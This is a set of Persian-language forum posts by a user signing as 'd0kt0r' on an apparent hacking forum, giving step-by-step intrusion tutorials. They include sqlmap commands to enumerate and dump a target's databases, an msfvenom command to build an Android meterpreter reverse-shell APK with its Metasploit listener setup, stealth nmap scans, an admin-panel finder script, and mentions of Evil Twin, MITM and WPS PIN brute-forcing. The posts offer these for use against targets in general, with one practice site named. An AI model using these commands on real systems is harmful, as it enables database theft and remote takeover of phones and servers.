d0kt0r

سلام با این آموزش برای SQL Injection دیگه نیازی به خیلی از ابزار ها و اسکریپت ها نخواهید داشت هر دو ابزار NMap و SQLmap روی کالی لینوکس نصبه. در این آموزش برای تست ابزار ها از لینک های زیر استفاده میکنیم که میتونین برای تمرین استفاده کنین: www.vulnweb.com testphp.vulnweb.com *** در وارد کردن هدف //:https رو پاک کنید و فقط .www بمونه!!! *** 1. با استفاده از کامند زیر وب سایت هدف رو برای پیدا کردن باگ SQL مثله warning page اسکن کنید: nmap -sV -script=http-sql-injection address website -p 80 *سویچ sV- میگه که پورت باز رو برای یافتن سرویس و نسخه ی اون پروب کن. *سویچ script- میگه از اسکریپت های ابزار nmap برای سکن هدف استفاده کن.(مثله : اسکنر باگ SQL) *سویچ p- هم میگه شماره پورت رو وارد کن که اینجا 80.(چون پورتیه که در وبسرور، سرور بهش گوش میده). *به جای address website ادرس هدف رو وارد کنید که اینجا برای تست: testphp.php.vulnweb.com بعد از یک مدت مکس برای اسپایدر کردن هدف که مدتش بستگی به حجم و صفحات وبسایت داره لیست صفحات دارای باگ رو خواهید دید. برای مثال : 2.از کامندهای زیر هم به ترتیب برای دست رسی به دیتا بیس و استخراج(مشاهده کالم و تیبل ها و../) اطلاعات استفاده کنید: sqlmap -u address yafte shode --dbs sqlmap -u address yafte shode -D esme data base --dump all *سویچ u- برای وارد کردن ادرس هدف. *سویچ dbs-- برای مشاهده ی دیتابیس های موجود در هدف. *سویچ D- برای وارد کردن اسم دیتابیس مورد نظر که اینجا . (عکس های خودم رو بعدا وارد میکنم فعلا همین باشه.) سوالی بود بپرسید d0kt0r .

سلام به اوله دستورت sudo اضافه کن درست میشه: sudo apt-get update d0kt0r

سلام دوست عزیز اول کامندت رو واسه ساخت اپ با این مقایسه کن : msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORT(mesle 4453) R > ادرس محل سیو فایل به جای IP ای پی استاتیک رو وارد کن یا اگه ای پی استاتیک نداری از پنلی مثله No ip استفاده کن تا پورت فوروارد کنی. به جای PORT هر پورتی که دوست داری ترجیحا مثله نمونه وارد شده. بعد از < R ادرس محل سیو فایل. و بعد پایلود : msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST IP internal ya hamoon priv8 set LPORT PORT ghabli exploit بعده LHOST ای پی داخی یا private رو وارد کن همونی که ماله سیستمه. بعد از LPORT همون پورتی رو که بالا وارد کردی وارد کن. بعد از تایپ exploit واستا تا نصب شه. d0kt0r

سلام میتونی از ابزار Psensor استفاده کنی طریقه نصب : اول lm sensor رو نصب کن. دستور های زیر رو به ترتیب وارد کن... ۱٫ واسه کالی و : Debian Based : # apt-get install lm-sensors hddtemp بعد خوده Psensor : apt-get install psensor دستور های زیر رو به ترتیب واسه نصب یه سر فایل مورد نیاز وارد کن: wget [Hidden Content] tar zxvf psensor-1.1.3.tar.gz cd psensor-1.1.3/ ./configure make make install بعد Psensor Server رو نصب کن: apt-get install psensor-server الان میتونی با رفتن به قسمت Applications تو لینوکس حال گرافیکی اون رو اجرا کنی. با دستور : sensors-detect ببین کار میکنه یه نه. d0kt0r .

سلام میشه به nmap owasp-zap هم اشاره کرد. این تاپیک هم مفیده : d0kt0r .

سلام آموزش نصب انواع سیستم عامل لینوکس بر روی گوشی اندروید در راستای تلاش سازندگان لینوکس در جهت افزایش کاربران سیستم عاملشون لینوکس دیپلوی (Linux Deploy) رو ساختند. یه جورایی تو مراحل اولیه هستش . همه ی فایل های مورد نیاز در پیوست موجوده. 1. یکی از طریقه های نصب لینوکس روی گوشی اندروید استفاده از Linux Deploy میباشد که سادست اما دسترسی روت میخواد. *پس در قدم اول باید گوشی روت باشه. *بعد از روت کردن مراحل زیر رو ادامه بدین: 2. نرم افزار لینوکس دیپلوی (Linux Deploy) رو نصب کنید. بعد از نصب نرم افزار رو اجرا کنید و برید به قسمت Config که در بالا <...> رو بزنین میبینین. *در قسمت Config با زدن Distribution نوع لینوکس مورد نظر رو انتخاب کنید. *Linux Deploy از نسخه های مختلف لینوکس پشتیبانی میکنه مثله : Kali , Debain, Ubuntu. *از قسمت Installation path مسیر ایجاد فایل img رو تعیین کنید (به طور پیشفرض روی حافظه خارجی ایجاد میشه که ایرادی هم نداره). * یکم پایین تر گزینه های SSH و VNC رو فعال کنید که برای دست رسی به محیط گرافیکی و ست کردن ترمینال با لینوکس آماده باشه. در نهایت install رو بزنید و صبر کنید که دانلود و نصب تموم شه (به نت کانکت باشید). 3.نرم افزار Terminal Emulator رو نصب و اجرا کنید : * بعد از اجرا دستور رو به رو رو وارد کنید تا SSH کانکشن از ترمینال داشته باشیم : username@ipaddress بعد از @ به جای ipaddress داخل نرم افزار Linux Deploy اون بالا ip تون رو نشون میده، وارد کنید. به جای username هم یوزرنیمی که در قسمت config میتونین تغییر بدین رو وارد کنید که به صورت پیشفرض kali هست الان ترمینال آمادس واسه استفاده با Command های لینوکس. 4.نرم افزار VNC Viewer رو برای مشاهده محیط گرافیکی لینوکس نصب کنید. با زدن علامت + اون پایین به جای Address وارد کنید localhost. و به جای name هرچی میخواین وارد کنید. با زدن connect به محیط گرافیکی وصل خواهید شد. بعد از اون از شما پسورد میخواد که پسورد پیشفرض changeme هست که با وارد کردن کامند : sudo passwd root میشه اون رو به root تغییر داد. در نهایت برای افزایش سرعت محیط نسبتا کند دستور زیر رو در ترمینال وارد کنید : dsl toram noacpi noapm noscsi dma سوالی بود بپرسین. d0kt0r Linux-Deploy-1.5.1[Androidiha.Com].apk VNC-Viewer-3.1.0.025890(FarsRoid.Com).apk Better_Terminal_Emulator_Pro_v4.03.apk

سلام یه نرم افزار ساده واسه SQL inject کردن در محیط اندروید. محیط کار خیلی ساده. Time based injection Error based injection Blind injection Normal injection d0kt0r DroidSQLi.apk

سلام یه اسکریپت سریع برای یافتن ادمین لاگین پیج به زبان پرل. فایل اماده رو هم برای دوستان تازه کارمون پیوست کردم. خودم ننوشتم Open source هست و فقط ادیت کردم. توسط : Tartou2 . 1.دقت کنید که هش بنگ (SHE Bang ya Hash Bang) با سیستمتون ست باشه و اگه ادرس ها متفاوته تغییر بدین. برای مثال کالی لینوکس به صورت :etc/perl/!# میباشد. 2.با اجرای اون ابتدا ادرس وب سایت رو وارد کنید (با .www). 3.بعد از وارد کردن ادرس زبانی که سایت رو نوشتن رو وارد کنید(PHP, HTTP, و...). 4.سورس کدش طولانی بود قرار ندادم. سوالی بود در خدمتم d0kt0r WWZszURW.pl

سلام اگه دسترسی به سیستم عامل لینوکس داری میتونم آموزش Evil Twin رو به طور اختصاصی و کامل قرار بدم تو سایت... که بتونین به قول خودت علاوه بر تزریق فیک پیچ کار های دیگه ای از قبیل MITM attack رو هم انجام بدین. d0kt0r

سلام یه سری به این تاپیک بزن: هک وای فای با گوشی به دلیل محدودیت زیادی که داره چندان جالب نیست برای مثال : کل پین های WPS رو میشه با لینوکس کالی تو ۳ تا ۴ ساعت بسته به سخت افزار سیستم تست کرد پیشنهاد : به لینوکس ایمان بیاورید پکیج آموزشی هم که تو همین سایت موجوده.

سلام در این جا به بررسی و آموزش تصویری Nmap خواهم پرداخت یکی از اولین و مهم ترین بخش های هک و نفوز به تارگت یا تست امنیتی یک سیستم اسکن کردن پورت ها و بررسی نوع سیستم عامل سرور و یا نوع وب اپلیکیشن هست. ابزار های بسیار مختلفی برای این کار وجود داره(که ادمین های گاردایران در اختیار شما قرار میدن) که یکی از مطرح ترین اون ها Nmap میباشد. که علاوه بر اسکن وظایف دیگه ای هم بر عهده داره، مانند اسپوفینگ، Evading firewall یا فرار از فایر وال، عیب یابی و یافتن راه های نفوز و اکسپلویت های موثر. Nmap برای هردو سیستم عامل ویندوز و لینوکس موجود است البته نسخه ویندوز این نرم افزار محدودیت هایی هم داره. کار با این نرم افزار سادست: ۱. نصب نرم افزار در محیط در ویندوز این نرم افزار محیط گرافیکی زیبایی داره که کار با اون رو آسون میکنه. لینک دانلود : [Hidden Content] فایل 1 مگابایت بیشتر از محدودیت سایت بود نتونستم پیوست کنم. در قسمت Target ادرس وبسایت یا ادرس ای پی هدف رو وارد میکنید. در قسمت Profile میتونید نوع اسکن رو انتخاب کنید که به صورت پیش فرض intense scan میباشد. و در قسمت Command دستور های اسکن رو که برای این نرم افزار در نظر گرفته شده رو وارد میکنید که بعضی ها رو بررسی خواهیم کرد که با وارد کردن این دستور ها میتونیم برای مثال : سرعت اسکن و ادرس یا ای پی مورد نظر و... رو تنظیم و هدف در در حالت امن اسکن کنیم دستور های قسمت Command : در ابتدای دستور همینطور که از شکل پیداست nmap خواهیم داشت سپس میتونیم با سویچ A- و بعد از اون هدف رو مشخص کنیم. با سویچ p- میتونیم رینج پورت یا همون محدوده پورت هایی که میخواییم اسکن کنیم رو تعیین کنیم مانند : nmap -p 1-65535 -sV -sS -T4 target که بد از سویچ T4- ای پی یا ادرس هدفمون رو خواهیم نوشت همچنین میتونیم با سویچ iL- یک لیست ای پی به Nmap بدیم تا اسکن کنه برای مثال : nmap -iL ip-addresses.txt که بعد از سویچ iL- اسم فایل رو خواهیم داشت. یک سری از دستور های مفید و با سرعت بالا: nmap -v -sS -A -T4 target به جای target ادرس یا ای پی هدف ر در خواهیم داشت این دستور تمامی پورت های TCP رو به طور کامل اسکن میکنه(متوجه نشدین توضیح میدم) nmap -v -p 1-65535 -sV -O -sS -T5 target دستور بالا علاوه بر اسکن تمامی پورت ها این کار رو مخفیانه انجام میده و با تایمینگT5 nmap -v -p 1-65535 -sV -O -sS -T4 target این دستور تمامی موارد بالا رو شامل میشه + نسخه وب اپلیکیشن و نسخه و نوع سیستم عامل هدف که دستور مورد علاقه منه. و با تایمینگ T4 کار اسکرینگ رو با سرعت و دقت بالا انجام میده. اموزش در محیط لینوکس هم بزودی اما کامند های هرو سیستم عامل یکی هستند. امیدوارم لذت ببرید سوالی بود در خدمتم. d0kt0r